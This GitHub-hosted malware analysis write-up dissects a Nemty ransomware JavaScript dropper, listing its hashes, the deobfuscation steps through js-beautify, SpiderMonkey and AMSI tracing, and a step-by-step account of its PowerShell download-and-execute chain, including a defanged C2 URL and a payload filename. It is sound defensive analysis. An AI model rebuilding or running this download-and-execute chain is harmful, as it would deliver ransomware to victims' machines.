Skip to content

Latest commit

 

History

History
75 lines (44 loc) · 4.72 KB

0x8 - Nemty Dropper.md

File metadata and controls

75 lines (44 loc) · 4.72 KB

Background - Nemty Ransomware

  • Nemty ransomware was first observed in the wild in August 2019 and its behavior is noted for being similar to GandCrab and Sodinokibi.

  • The source code includes an affiliate ID, which suggests its deployment as a service (rather than being used by a single threat actor for their own campaigns).

  • By default, the typical ransom request would be $1,000 worth of BTC (approximately 1/10th of a bitcoin at that time).

  • The malware is not very sophisticated, including some weirdly redundant features. For example, it known to perform a language check for several ex-USSR countries, but still proceeds with execution regardless (whereas Locky on the other hand, stops if it detects Language ID 0x19 which is the language ID code for Russian).

  • At the time of this writing, Nemty has never been formally attributed to a specific threat actor.

  • Historically, it has been delivered via at least one botnet and one or more exploit kits.

  • Fortinet has a great technical write-up here.

Analysis

Hash Type File Hash
MD5 ce58fe36343afdbe2b2a36f123ecb9a7
SHA1 ce17790e9c0d1547f25aa3d30e38b5f17eb9fc8a
SHA-256 f3e743c919c1deaf5108d361c4ff610187606f450fabda0bea3786d4063511b1
  • The sample for this analysis is a .js file which appears to be heavily obfuscated.

Pasted image 20240704153003

  • Viewing the full contents of the script in Visual Studio Code, this script is very ugly. We can clean it up with js-beautify.

  • Viewing the beautified contents, we see two instances of the eval command. In JavaScript, the eval command "evaluates JavaScript code represented as a string and returns its completion value." (source: Mozilla).

Pasted image 20240704172721 Pasted image 20240704172747

  • The presence of the eval commands implies that the script will de-obfuscate itself and execute. Since this is the case, the next step will be to emulate it with SpiderMonkey using js -f malscript.js.

  • Luckily, this turns out to be a very simple script once de-obfuscated.

Pasted image 20240704173038

  • We can also run it on a Windows machine using cscript, which is the built-in Windows scripting host. If we use this in combination with AMSI, we can actually see the contents of the .js file de-obfuscated.

  • To do this, we start from an administrative PowerShell console:

logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets

cscript malscript.js

logman stop AMSITrace -ets

AMSIScriptContentRetrieval > malscript-output.txt

  • Here's a sample of what the output looks like after having used AMSI Script Content Retrieval:

Pasted image 20240704173535

  • The malicious .js file appears to instantiate two ActiveX objects - a WScript shell and a shell.application.
  • It then executes cmd.exe and passes a command to it that executes PowerShell to do the following:
  1. Bypass the execution policy
  2. Spawn a hidden window
  3. Create a new web client object
  4. Use the newly created web client object to reach out to http://92.63.197[.]190/nnn[.]exe with a very specific user-agent Google Chrome and save the payload in the %temp% directory as erb19.exe.
  5. Lastly, it executes the newly staged payload.

Summary

  • This sample is a Nemty ransomware dropper that arrives to the end user as a heavily obfuscated .js file.
  • After the end user double-clicks it, it will be executed by cscript and execute malicious PowerShell via cmd.exe.
  • The PowerShell creates a new web-client object, assigns a Google Chrome user-agent, and downloads the second stage payload from the C2 server.
  • Lastly, the new payload gets executed on the victim machine.